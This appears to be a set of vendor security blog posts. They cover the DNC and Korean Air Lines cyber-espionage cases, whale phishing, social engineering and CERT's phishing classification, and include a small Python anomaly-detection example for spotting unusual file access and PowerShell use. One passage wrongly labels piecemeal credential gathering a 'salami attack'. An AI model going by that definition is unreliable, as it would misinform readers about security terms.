The takeaway lesson for IT is that they need a secondary security defense, one that monitors hackers when they’re behind the firewall and can detect unusual behaviors by analyzing file system activity.

Want to find out more, click here!

Did you click? Good, that link doesn’t point to a Varonis domain!

Another conclusion of the study is that your organization should also undertake security training, especially for non-tech savvy staff.

We approve as well: it’s a worthwhile investment!


Cyber Espionage: Could Russian and Korean Hackers Have Been Stopped (With UBA)?

Once upon a time, breaking into the Democratic National Committee required non-virtual thieves picking real door locks and going through file cabinets. And stealing the design secrets of a fighter jet was considered a “black bag” job that utilized the talents of a spy who knew how to work a tiny spy camera. Then, the stealthy spy could pass the micro-film to a courier by exchanging identical brief cases.

Times have changed.

In the last few days, two stories have shown us, if we still needed more evidence, how modern espionage has evolved into hacking. Cyber spies can conduct first-class intelligence operations without leaving their desks at the IT departments of their Dr. Evil-ish security agencies.

Spies Like Us

Yesterday, The Washington Post said that Russian government hackers had penetrated the DNC’s computer network.

According to security experts who were brought in by the DNC, the cyber spies thoroughly compromised the DNC’s computers and were able to read all email and chat traffic.

Unfortunately, this news is hardly a surprise. In fact, we predicted this would happen.

It’s believed that two separate and perhaps competing Russian hacking groups were involved, with one of them having broken into the DNC network as far back as last summer. No financial information about donors was taken. The hackers were engaging in espionage, gaining access to the DNC’s opposition research on Donald Trump.

And then on the Korean peninsula, South Korean officials said 40,000 documents related to the wing design of the US’s F-15 fighter jet had been taken by their friendly neighbors to the north.

Stealthy Attacks

We have more information about the Russian spies, so let’s look at that incident first.

One of the Russian cyber groups involved in the DNC was identified as Cozy Bear. This is the same group responsible for attacks at the White House. The second group is called Fancy Bear, and they have been known to exploit zero-day vulnerabilities.

Security experts say that both groups have also used phishing attacks in the past. Cozy Bear and Fancy Bear are believed to be connected to Russian intelligence agencies.

At this point, though, we’re not sure exactly how the gangs broke into the DNC network.

However, we do know that once in, they inserted remote access trojans (RATs) and implants that allowed them to remotely log keystrokes, execute commands, and transfer files. The Russian cyber gangs also used Command and Control (C2) techniques, which embed the commands to control the RATs in an HTTP stream.

As far as IT admins were concerned, some users at the DNC were communicating with one or more web sites, when in fact these C2 web sites were run by the cyber gangs and used to orchestrate the attack.

The Russian cyber spies also hid their actions by running PowerShell commands: malware-less hacking. They harvested credentials with Mimikatz, run as a stealthy PowerShell script, and reused them in pass-the-hash and pass-the-ticket attacks.

Putting on our intelligence analyst’s hat, I think we can say with good confidence that the North Koreans used similar techniques. A phish mail, for example, involving fake Apple IDs was used to initially enter Sony in Pyongyang’s massive doxing of that company.

The current attack that was launched against Korean Air Lines began in 2014. The North Korean cyber spies likely used the aforementioned stealth techniques to keep their implants and document exfiltration activities below the radar.

Spy Lessons

If you’ve been following along, none of the above, unfortunately, should be new to you. In fact, for anyone who’s been keeping track of hacking incidents over the last few years, these different techniques and tools are just familiar parts of the landscape.

We’ve known for a very long time that the smart hackers get around perimeter defense using phishing, SQL injection, or zero-day vulnerabilities. And once in, they have many ways to remain stealthy and avoid triggering virus scanners.

Instead of trying to build a higher wall, a more practical approach is to spot the hackers when they’re inside and then prevent them from accessing and exfiltrating sensitive data.

In both the DNC and Korean Air Lines incident, the IT teams eventually noticed some anomalies. However, at that point, it was far too late in terms of preventing the surveillance of internal emails and the removal of data.

A far better solution is to automate the anomaly detection so that when files are accessed at unusual times for a given user or PowerShell executables launched by users who hardly or never run these apps, then the alarms will go off.

We are, of course, talking about User Behavior Analytics (UBA). As these incidents teach us, the protection of sensitive data is too important to be based on hunches or the blind luck of an alert IT person looking at audit trails.

Instead, UBA’s predictive algorithms can compare current access patterns against historical records in order to spot the hackers in closer to real-time.
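Here is an added example of the baseline-and-compare logic described above, written in Python against a constructed audit trail. It is illustrative code, not Varonis’s UBA engine: the event format, the sample users and file paths, and the thresholds (minimum history before judging hours, the 5% rare-hour cutoff, two prior launches) are assumptions chosen for the demonstration.

```python
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample audit trail shaped like a file-server log merged with an
# endpoint process log. Each record: (ISO timestamp, user, event type, detail).
# Not real Varonis output; users, paths and times are made up.
HISTORY = [
    ("2016-03-01T09:12:00", "alice", "file_read", "\\\\fs1\\finance\\q1.xlsx"),
    ("2016-03-01T10:40:00", "alice", "file_read", "\\\\fs1\\finance\\budget.xlsx"),
    ("2016-03-02T09:03:00", "alice", "file_read", "\\\\fs1\\finance\\q1.xlsx"),
    ("2016-03-02T14:25:00", "alice", "file_read", "\\\\fs1\\finance\\forecast.xlsx"),
    ("2016-03-03T11:15:00", "alice", "file_read", "\\\\fs1\\finance\\budget.xlsx"),
    ("2016-03-03T16:50:00", "alice", "file_read", "\\\\fs1\\finance\\q1.xlsx"),
    ("2016-03-01T09:20:00", "alice", "process_start", "excel.exe"),
    ("2016-03-02T09:05:00", "alice", "process_start", "excel.exe"),
    ("2016-03-01T08:30:00", "bob", "process_start", "powershell.exe"),   # bob is an admin
    ("2016-03-01T13:30:00", "bob", "process_start", "powershell.exe"),
    ("2016-03-02T09:00:00", "bob", "process_start", "powershell.exe"),
    ("2016-03-02T10:10:00", "bob", "file_read", "\\\\fs1\\it\\runbook.docx"),
]

# Assumed thresholds; tune against your own audit volume.
MIN_BASELINE_EVENTS = 5    # need this much file history before judging a user's hours
RARE_HOUR_FRACTION = 0.05  # an hour holding < 5% of a user's file activity is "unusual"
RARE_PROCESS_RUNS = 2      # fewer prior launches than this counts as "hardly ever runs it"
WATCHED_PROCESSES = {"powershell.exe", "powershell_ise.exe"}


def build_baseline(events):
    """Per-user profile: which hours they touch files, and which programs they launch."""
    hours = defaultdict(Counter)   # user -> Counter{hour_of_day: file reads}
    procs = defaultdict(Counter)   # user -> Counter{image name: launches}
    for ts, user, kind, detail in events:
        if kind == "file_read":
            hours[user][datetime.fromisoformat(ts).hour] += 1
        elif kind == "process_start":
            procs[user][detail.lower()] += 1
    return {"hours": hours, "procs": procs}


def score_event(baseline, event):
    """Compare one new event against the user's history; return alert strings (empty = normal)."""
    ts, user, kind, detail = event
    alerts = []
    if kind == "file_read":
        seen = baseline["hours"][user]
        total = sum(seen.values())
        hour = datetime.fromisoformat(ts).hour
        # Users with too little history are skipped rather than flagged on every event.
        if total >= MIN_BASELINE_EVENTS and seen[hour] / total < RARE_HOUR_FRACTION:
            alerts.append(f"{user}: file access at {hour:02d}:00 is outside usual hours ({detail})")
    elif kind == "process_start":
        image = detail.lower()
        prior = baseline["procs"][user][image]
        if image in WATCHED_PROCESSES and prior < RARE_PROCESS_RUNS:
            alerts.append(f"{user}: launched {image}, seen {prior} times before")
    return alerts


# Constructed "today" events: alice's account touches finance files at 2 a.m.
# and then starts PowerShell, which she has never run; bob's PowerShell use is routine.
NEW_EVENTS = [
    ("2016-03-04T02:17:00", "alice", "file_read", "\\\\fs1\\finance\\q1.xlsx"),
    ("2016-03-04T02:18:00", "alice", "process_start", "powershell.exe"),
    ("2016-03-04T09:30:00", "bob", "process_start", "powershell.exe"),
    ("2016-03-04T09:45:00", "alice", "file_read", "\\\\fs1\\finance\\budget.xlsx"),
]


def run(history=HISTORY, new_events=NEW_EVENTS):
    """Learn the baseline from history, then score each new event. Returns all alerts."""
    baseline = build_baseline(history)
    return [alert for event in new_events for alert in score_event(baseline, event)]


if __name__ == "__main__":
    for alert in run():
        print("ALERT", alert)
```

Two alerts come out, both for alice’s account; bob’s routine PowerShell use and alice’s 9:45 spreadsheet read stay quiet. Two caveats a practitioner should keep in mind: the baseline is learned from the same audit trail the intruder may already be in (in the Korean Air Lines case, since 2014), so history that is years old should be reviewed before it is trusted as “normal”; and rare-process alerts are only as good as the process logging feeding them, so PowerShell script-block and module logging need to be on for this to see anything.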

Think of UBA as giving your IT group the power to spy on hackers and cyberspies. It’s far more efficient and cheaper than training and outfitting an agent. Sorry, 007!

Got UBA? Learn more about how Varonis can protect your data.

CEO Phishing: Hackers Target High-Value Data

Humans like to click on links. Some of us are better at resisting the urge, some worse. In any case, you’d also expect that people in the higher reaches of an organization — upper-level executives and the C-suite — would be very good at resisting phish bait.

Harpooning the Whale

Alas, even the big phish like to chomp on the right links.

We now have even more evidence that cyber thieves are getting better at fine tuning their attacks against high-value targets — known as “whale phishing”.

The security firm Digitalis tells us that attackers are using social media to research an executive’s habits, say an interest in cricket, and to identify a business associate, also found through social media. They then forge an email from that associate, mentioning the cricket match, with a malware payload embedded.

This is business-class phishing!

The attraction of the corporate whale is that they are likely to have incredibly valuable information on their laptops: not the commodity PII involved in most data breaches, but intellectual property and other sensitive data, such as deals in progress, key customers, confidential financial data, or embarrassing emails.

It’s the kind of information that could be sold to competitors or, better yet, doxed unless a ransom is paid.

We’ve long known that phishing attacks that are based on better research are very effective. The more the attacker knows about you, the more likely you are to trust the sender.

Which would you click on: an email sent by a Nigerian finance minister regarding unclaimed funds, or an email from your bank — from your local branch — saying there’s been an adjustment to your balance, and you’ll need to look at the attached PDF?  Enough said.

Executive Privacy

Digitalis also found that executives, like the rest of us, are not very good about their privacy settings on Facebook and other social networking sites. Less than half of those surveyed restrict who can see their profile, and only 36% keep their social settings up to date.

Should executives simply forgo social media?

I’ve heard experts say that if C-levels and other execs don’t set up their own accounts, the hackers will do the work for them by establishing a forged identity and squatting on their property. This can then lead to very sophisticated phishing.

My advice: as an executive, you should take charge of your social persona. This leads to one of the points of the Digitalis Research: executives (and the rest of us as well) should never reveal more than they have to in these social networks.

As in the file system world, always change from the default “everyone” setting, and restrict information to just friends.

And since social networking companies — well at least one — have had a bad habit of tweaking these settings, you should, as Digitalis suggests, periodically revisit your account.

Concierge Security?

Security pros have pointed out that social networks, by design, will always share some information by default, and this typically includes who your friends are.

Even with very restrictive settings, a smart attacker can still use this friend information to make very good guesses about the habits, interests, and preferences of the target account—say, the CFO of the company.

Welcome to our world!

There are no easy answers here when it comes to protecting executives from attacks. It’s essentially the problem organizations face with hackers in general: they will get in!

The more important point is to monitor and detect for unusual system and file events to reduce the risks.

In a past blog post, I’ve said it’s worth devoting IT security resources to monitoring the computer activities of corporate VIPs. With this latest research, I’ll double down on that position.

And if the company is large enough, this could include dedicated staff — perhaps a security concierge service.

In any case, it does make sense to take any alarms and notifications involving the computer accounts of C-levels very seriously. Don’t view them as likely false positives.

It’s worth tracking them all down until they’re resolved.

Social Engineering Remains a Top Cybersecurity Concern

In 2016, the top cyberthreat for IT pros, at least according to ISACA’s Cybersecurity Snapshot, is social engineering. It has always been a classic exploit amongst the hackerati, but in recent years it has become a preferred entry technique.

Instead of breaking into a network, an attacker merely has to manipulate those who have access to the victim’s data, or even the victim, into giving away credentials: “Is your Requester Code 36472? No, it’s 62883.” Technically this is a salami attack: it works by fooling several people, each for a small piece, until the attacker has enough slices of information to piece together the credentials needed to access the user’s account.

In previous blog posts, we’ve covered a few ways to help guard against social engineering. But because social engineering can’t be blocked by technology alone, humans remain the weakest link in this security problem.

“People inherently want to be helpful and therefore are easily duped,” said Kevin Mitnick, who was once the country’s most wanted computer criminal. “They assume a level of trust in order to avoid conflict.”

As IT security groups allocate their resources to defend against major security threats, they shouldn’t forget to continuously educate end users on social engineering methods so they don’t become easy targets to exploit.

Let’s review the most common forms of social engineering:

  1. Phishing

One of the easiest ways to become infected with malware (ransomware, anyone?) is through phishing. With a phishing attack, the bait is an email containing personal information hackers have collected through prior reconnaissance. Crafted to look like an official communication from a legitimate source (FedEx, UPS), the phish mail is intended to catch victims off guard, duping them into clicking a link that takes them to a fraudulent web site or into opening a file attachment containing a malware payload.

Often the hackers will focus on high-value targets, bamboozling executives and other C-levels. The goal in “whale phishing” is usually to extract IP or other very confidential and possibly embarrassing information.

Educate your staff! Don’t click on links or open attachments or emails from people you don’t know or companies you don’t do business with.

  2. Pretexting aka Impersonation

Pretexting is the more direct, person-to-person cousin of phishing: the attacker invents a plausible scenario, the pretext, and works it through old-fashioned human interaction, typically a phone call. Fun fact: Hannibal Lecter knew how to pretext!

While Anthony Hopkins may have impersonated a temporary employee from his jail cell, real-life pretexters can impersonate a fellow employee, IT representative, or vendor. Their goal is to gather confidential or other sensitive information: SSN, bank account, mother’s maiden name, or the size of your savings and investment accounts. Today, attackers are also outsourcing the pretexting work to companies that will make the calls for them. Talk about progress!

Pretexting had become such a problem that in 1999 the Gramm-Leach-Bliley Act (GLBA), better known for improving financial data security, flat out made it illegal: obtaining a customer’s information from a financial institution under false pretenses became a federal offense.

The statute applies to all organizations that handle financial data, including banks, brokerages, credit unions, income tax preparers, debt collection agencies, real estate firms and credit reporting agencies. Take that Hannibal Lecter.

However, GLBA has not stopped a new generation of pretexters from selling the data they’ve collected to data brokers, who may then resell it to private investigators or even insurance companies.

  3. Baiting

Baiting is like phishing, but the attacker dangles an enticing offer in front of the victim. It could be a free download (music, movie, book) or a USB flash drive stamped with the company logo and labeled “Confidential Company Roadmap”, dropped where an employee will find it.

Once curiosity or greed leads the victim to download the file or plug in the device, the victim’s computer gets infected with malware, giving the attacker a foothold inside the network.

  4. Quid Pro Quo (This for That)

Similar to baiting,  a Quid Pro Quo also lures but with a practical benefit – usually a service – such as “Please help me with my computer!” Instead of fixing the problem, the attacker installs malware on the victim’s computer.

  5. Piggybacking (or Tailgating)

Piggybacking happens in the non-virtual world, involving a person tagging along with a legitimate employee who is authorized to enter a restricted area.

Solution? Implement one of the most basic security tips: set your PC to lock after inactivity! That won’t stop the tailgater at the door, but it limits what an uninvited visitor can do at an unattended desk.

Want to guard against social engineering? Make sure least privilege is built into your authorization processes, so that a single duped employee can’t hand over more than their own limited access.

Image source: ISACA’s January 2016 Cybersecurity Snapshot, Global Data

Phishing Attacks Classified: Big Phish vs. Little Phishes

The CMU CERT team I referred to in my last post also has some interesting analysis on the actual mechanics of these phishing attacks. Based on reviewing their incident database, the CERT team was able to categorize phishing attacks into two broader types: single- versus multi-stage.

What’s the difference? Think of single-stage as catching lots of small phish, and multi-stage as landing the big one.

Single-Stage Attacks: Mass Marketing

In a single-stage attack, the hacker is interested in collecting information directly from individual users, and accomplishes this through a volume approach: blasting out emails and hoping for some small percentage of click-throughs. It’s essentially mass marketing applied to phishing. The CMU folks have learned that response rates are roughly between 3% and 11%, so hackers probably know in advance the yields they’ll achieve from campaigns based on their various lists.

Single-stage phishing is the one we often come across in our inbox—i.e., FedEx shipment waiting, credit card cancelled, etc. Once the bait is taken, the hackers receive personal data directly from the user, who has typically been tricked into entering details into a web form—credit card, social security numbers, passwords, etc.

Multi-Stage Attacks: The Business Class of Phishing

Multi-stage is the better planned, deadlier attack launched by more sophisticated cyber-thieves. In this case, the hackers are not interested in obtaining just basic personal data from a single user.

According to CERT, their “response and information capture” phase (see the graphic below) now has multiple parts: hackers probe the system to obtain higher privileges with the goal to find more granular data (PII, IP),  possibly learn about system internals for another attack, find additional phishing targets, or even use the data to target more high-value phish—executives.

Figure: CERT’s diagram of the multi-stage phishing attack (image not reproduced). From Unintentional Insider Threats: A Review of Phishing and Malware Incidents by Economic Sector (CMU CERT)

CERT’s Advice

While the academic community continues to explore why we click on some obviously spammy stuff, the CERT team has some solid advice on mitigation:

  • Organizations need to view compliance not as an obstacle to job productivity, but as an essential part of an employee’s responsibilities.
  • IT needs to deploy more programs to train staff on identifying social engineering schemes.
  • There should be a focus on improved tools for computer and network defense cyber monitoring.

Varonis eBook explains how phishing works:  get our free Anatomy of a Phish!

Image credit: Presus museum